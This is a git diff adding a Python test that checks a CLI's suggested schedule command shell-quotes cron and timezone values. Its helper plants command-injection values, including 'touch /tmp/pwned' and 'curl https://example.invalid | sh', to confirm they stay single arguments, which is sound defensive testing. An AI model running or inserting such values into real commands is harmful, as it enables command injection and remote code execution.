84593dbc3..4b13d2dee 100644 --- a/tests/test_sync_clone_links.py +++ b/tests/test_sync_clone_links.py @@ -10,6 +10,7 @@ import copy import itertools +import shlex import shutil from collections.abc import Callable from pathlib import Path @@ -285,6 +286,12 @@ def _with_disabled_schedule(components: list[dict[str, Any]]) -> None: schedule["configuration"]["schedule"]["state"] = "disabled" +def _with_hostile_schedule(components: list[dict[str, Any]]) -> None: + schedule = _component_entry(components, SCHED)["configurations"][0]["configuration"] + schedule["schedule"]["cronTab"] = "0 3 * * *'; touch /tmp/pwned; echo '" + schedule["schedule"]["timezone"] = "UTC; curl https://example.invalid | sh" + + def _with_second_schedule(components: list[dict[str, Any]]) -> None: _component_entry(components, SCHED)["configurations"].append(_schedule("sched-2", "Hourly")) @@ -883,6 +890,30 @@ def test_disabled_schedule_hint_keeps_it_disabled(tmp_path: Path, tmp_config_dir assert "--timezone UTC --disabled`" in warning["message"] +def test_schedule_hint_quotes_values_from_the_reference_tree( + tmp_path: Path, tmp_config_dir: Path +) -> None: + # The cron and the timezone come from the reference tree. The suggested + # command must pass them as single arguments, never as extra shell commands. + world = World(tmp_path, tmp_config_dir, reference=_with_hostile_schedule) + [warning] = _warnings_of(world.clone(), "schedule_not_active") + command = warning["message"].split("`")[1] + flow_id = world.target(FLOW)["id"] + assert shlex.split(command) == [ + "kbagent", + "flow", + "schedule", + "--project", + "target", + "--flow-id", + flow_id, + "--cron", + "0 3 * * *'; touch /tmp/pwned; echo '", + "--timezone", + "UTC; curl https://example.invalid | sh", + ] + + def test_two_schedules_on_one_flow_get_no_command(tmp_path: Path, tmp_config_dir: Path) -> None: # `flow schedule` updates the first schedule of a flow, so it could update # the wrong one: the warning points at the UI instead.